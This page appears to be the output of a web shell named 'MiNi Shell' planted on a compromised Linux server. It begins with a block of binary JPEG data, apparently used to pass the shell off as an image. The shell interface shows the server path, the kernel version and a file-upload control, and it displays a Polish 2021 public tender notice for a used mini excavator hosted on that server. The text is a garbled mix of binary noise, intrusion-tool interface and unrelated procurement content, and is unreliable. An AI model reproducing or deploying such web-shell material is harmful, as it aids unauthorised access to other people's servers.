JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210728/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210728/0012984601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00129846 z dnia 2021-07-28</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa używanej minikoparki gąsienicowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zapopradzie sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 381109894</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Piłsudskiego 128</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Muszyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-370</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">18 471-41-97</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">18 471-40-89</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zapopradzie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zapopradzie.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka z o.o. </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa używanej minikoparki gąsienicowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ec7be1f9-ef91-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00129846</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00008486/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa używanej minikoparki</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pgk-muszyna.pl/index.php/bip <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja pomiędzy Zamawiającym a wykonawcami, z wyjątkiem składania ofert, odbywa się za<br/>pośrednictwem dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz<br/>udostępnionego przez miniPortal. Korespondencja przesłana za pomocą tego formularza nie może być<br/>szyfrowana. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do<br/>komunikacji wynosi 150 MB. 2. Oferty należy składać za pośrednictwem „Formularza do złożenia,<br/>zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na<br/>miniPortalu. Szczegółowe informacje dotyczące sposobu składania ofert określone zostały w rozdziale<br/>XIV SWZ (sposób oraz termin składania ofert). 3. Zamawiający może również komunikować się z<br/>wykonawcami za pomocą poczty elektronicznej, na adres email: inwestycje@zapopradzie.pl 4.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP. 5. We wszelkiej komunikacji<br/>związanej z niniejszym postępowaniem prowadzonej za pośrednictwem miniPortalu i ePUAP<br/>Zamawiający i wykonawcy posługują się identyfikatorem postępowania z MiniPortalu.6. W komunikacji<br/>prowadzonej za pomocą poczty elektronicznej Zamawiający dopuszcza posługiwanie się również<br/>oznaczeniem postępowania Z.ZP.271.2.2021.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotyczące przetwarzania danych osobowych zostały zawarte w rozdziale XXIV SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">Z.ZP.271.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa minikoparki gąsienicowej o następujących<br/>parametrach technicznych:<br/>Opis techniczny minimum wymagalnych parametrów technicznych i wymogów funkcjonalnych<br/>dla przedmiotu zamówienia:<br/>MINIKOPARKA GĄSIENICOWA<br/>1<br/>PRZEDMIOT ZAMÓWIENIA<br/>1. Przedmiotem zamówienia jest nabycie i przekazanie Zamawiającemu do odpłatnego<br/>korzystania używanej minikoparki gąsienicowej.<br/>2. Rok produkcji koparki – min. 2019 r.<br/>CHARAKTERYSTYKA TECHNICZNA<br/>1. Parametry techniczno-użytkowe:<br/>1) Przebieg max. 1200 mtg,<br/>2) Moc silnika: min 15,2 KW,<br/>3) Masa pojazdu z kabiną min. 2500 kg, max. 2700 kg,<br/>4) Pedał sterowania jazdą,<br/>5) Światło robocze mocowane na wysięgniku,<br/>6) Maksymalna siła kopania łyżki min. 22 kN,<br/>7) Funkcja ruchu swobodnego lemiesza,<br/>8) Przednia szyba dzielona,<br/>9) Immobilizer,<br/>10) Ogrzewana kabina,<br/>11) Przeciwwaga min. 110 kg,<br/>12) Sygnał dźwiękowy cofania,<br/>13) Lampa ostrzegawcza,<br/>14) Radio,<br/>15) Szybkozłącze mechaniczne,<br/>16) Łyżka kopiąca o szerokości min. 300 mm,<br/>17) Łyżka kopiąca o szerokości min. 500 mm,<br/>18) Łyżka skarpowa o szerokości min. 1000 mm.<br/>2. Rozwiązania równoważne:<br/>1) Przedmiot zamówienia został opisany zgodnie z art. 99 ustawy Pzp, jednakże Zamawiający<br/>informuje, że ilekroć w opisie przedmiotu zamówienia, w dokumentacji projektowej,<br/>wykonawczej służącej do opisu przedmiotu zamówienia, SWZ lub załącznikach do SWZ,<br/>przedmiot zamówienia został opisany ze wskazaniem znaków towarowych, patentów lub<br/>pochodzenia, źródła lub szczególnych procesów, które charakteryzują produkty lub usługi<br/>dostarczane przez konkretnego Wykonawcę, Zamawiający dopuszcza rozwiązania<br/>równoważne. Dotyczą one wszystkich elementów/składników opisu przedmiotu zamówienia w<br/>niniejszym postępowaniu, które są wymagane od Wykonawcy.<br/>2) Zasady oceny rozwiązań równoważnych w niniejszym postępowaniu obejmuje zakres badania<br/>i oceny ofert, gdzie nie wypełnienie wszystkich elementów tego opisu może być podstawą do<br/>odrzucenia oferty zgodnie z art. 226 ust. 1 pkt. 5 ustawy Pzp.<br/>3) Podobna zasada obowiązuje w przypadkach, gdy w opisie przedmiotu zamówienia zostały<br/>wprowadzone odniesienia do norm, europejskich ocen technicznych, aprobat, specyfikacji<br/>technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3<br/>ustawy Pzp.<br/>4) Oferowanie rozwiązań równoważnych do wskazanych w opisie przedmiotu zamówienia<br/>wymaga dodatkowo wykazania, że oferowane rozwiązanie równoważne jest o parametrach<br/>techniczno - eksploatacyjno - użytkowych nie gorszych, niż wymagane przez Zamawiającego.<br/>Ciężar wykazania spełnienia tych wymagań leży po stronie Wykonawcy w składanej ofercie lub<br/>jeżeli ten przypadek ma miejsce w trakcie realizacji umowy – w chwili zaistnienia konieczności<br/>dokonania takiej zmiany.<br/>5) W przypadku zastosowania zasad wskazanych powyżej w trakcie realizacji umowy, mogą one<br/>wystąpić pod warunkiem, że zmiany te nie będą wpływać na oferowany w ofercie przedmiot<br/>zamówienia i efekt zakreślony niniejszą SWZ. Mogą to być także przypadki korzystne dla<br/>Zamawiającego. Obowiązkiem strony wnoszącej o takie rozwiązanie równoważne (w trakcie<br/>realizacji zamówienia Zamawiający lub Wykonawca) wymagane jest uzasadnienie tego<br/>przypadku w formie pisemnej. Nie mogą one jednak zmienić istotnych elementów oferty czy<br/>umowy, przykładowo: wydłużenia terminu realizacji, podwyższenia wynagrodzenia w stosunku<br/>do tego wymaganego zapisami SWZ.<br/>6) Wykazanie, że oferowane przez Wykonawcę rozwiązania spełniają wymagania określone<br/>przez Zamawiającego musi nastąpić w złożonej ofercie z podaniem szczegółowych parametrów<br/>zaproponowanych materiałów i urządzeń oraz udowodnienia okoliczności wynikających z<br/>wcześniejszych zapisów. Stosowanie powyższych rozwiązań równoważnych dotyczy także<br/>przypadków, gdy w opisie przedmiotu zamówienia wskutek jakiegoś niedopatrzenia pojawiły się<br/>wskazania, o których mowa powyżej.<br/>3. Nazwy i kody zamówienia wg Wspólnego Słownika Zamówień (CPV):<br/>43260000-3 Koparki, czerparki i ładowarki, i maszyny górnicze<br/>43640000-1 Części koparek<br/>4. Gwarancja: Wykonawca zobowiązany będzie do udzielenia gwarancji na koparkę gąsienicową<br/>na okres 12 miesięcy, chyba, że wykonawca/producent danego pojazdu udziela dłuższej<br/>gwarancji - wówczas obowiązuje termin określony w gwarancji wykonawcy/producenta. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43260000-3 - Koparki, czerparki i ładowarki, i maszyny górnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">43640000-1 - Części koparek</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">A. Kryteria oceny ofert i ich znaczenie<br/>1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert wskazanymi poniżej:<br/>Cena - 60%<br/>Skrócenie terminu realizacji zamówienia - 40%<br/>B. Sposób oceny ofert w oparciu o kryteria<br/>1. Zamawiający dokona oceny ofert w zakresie kryterium „Cena” na następujących zasadach:<br/>a) Podstawą oceny ofert w tym kryterium będzie cena brutto za wykonanie przedmiotu zamówienia,<br/>podana przez Wykonawcę w Formularzu ofertowym.<br/>b) Liczba punktów przyznanych poszczególnym ofertom wyliczona zostanie wg. formuły:<br/>Kc = C min / C of ocen x 60<br/>gdzie:<br/>Kc – liczba punktów otrzymanych w kryterium „Cena”<br/>C min – cena najniższa wśród ofert nie odrzuconych<br/>C of ocen – cena oferty badanej<br/>c) Ilość punktów obliczona według powyższej formuły zostanie zaokrąglona do dwóch miejsc po<br/>przecinku.<br/>2. Punkty za kryterium skrócenie terminu realizacji zamówienia (Kstrz) zostaną przyznane w skali<br/>punktowej do 40 punktów w następujący sposób:<br/>- Termin realizacji zamówienia 7 dni i mniej - 40 pkt;<br/>- Termin realizacji zamówienia od 8 do 10 - 20 pkt;<br/>- Termin realizacji zamówienia od 11 do 14 - 0 pkt.<br/>Maksymalna liczba punktów, jaką w tym kryterium uzyska oferta wynosi 40.<br/>3. Oferta, w której Wykonawca zaoferuje skrócenie terminu realizacji zamówienia powyżej wymagane<br/>w SWZ maksimum lub nie poda terminu zostanie odrzucona, zgodnie z art. 226 ust. 1 pkt 5) ustawy<br/>Pzp.<br/>4. Za najkorzystniejszą uznana zostanie oferta, która otrzyma największą ilość punktów rozumianą jako<br/>suma punktów przyznanych na podstawie kryteriów oceny ofert podanych w punkcie A, a obliczonych<br/>zgodnie z zasadami określonymi w punktach B.2, B.3, czyli równą Kc + Kstrz.<br/>5. Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny<br/>ofert, przyjmując zasadę, że 1 % = 1 pkt. Maksymalna liczba punktów w kryterium równa jest określonej<br/>wadze kryterium w %. Uzyskana liczba punktów w ramach kryterium zaokrąglana będzie do drugiego<br/>miejsca po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia braku podstaw wykluczenia z udziału w postępowaniu o udzielenie<br/>zamówienia, na podstawie art. 108 ust. 1 ustawy Pzp Wykonawca zobowiązany jest do złożenia<br/>oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>zamawiającego.<br/>2. Szczegółowe wymagania dotyczące formy złożenia podmiotowych środków dowodowych zostały określone w SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. W celu potwierdzenia, że osoba działająca w imieniu Wykonawcy, Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, podmiotu udostępniającego zasoby jest umocowana<br/>do jego reprezentowania, Zamawiający żąda od Wykonawcy odpisu lub informacji z Krajowego<br/>Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru lub wskazania danych umożliwiających Zamawiającemu dostęp do tych<br/>dokumentów.<br/>2. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w pkt. 1 jeżeli<br/>Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>wykonawca wskazał dane umożliwiające dostęp do tych dokumentów np. w treści Formularza<br/>ofertowego.<br/>3. Jeżeli w imieniu Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, podmiotu udostępniającego zasoby działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów, o których mowa w pkt. 1 Zamawiający może żądać<br/>od Wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do<br/>reprezentowania Wykonawcy. Forma pełnomocnictwa została wskazana w rozdziale XIV<br/>(Sposób i termin składania ofert). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, o<br/>którym mowa w art. 125 ust. 1 składa każdy z Wykonawców.<br/>2. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, określone zostały w załączniku nr 4 do SWZ.<br/>2. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp. oraz wskazanym we wzorze<br/>umowy, stanowiącym załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-05 08:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-05 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-02</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-28 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com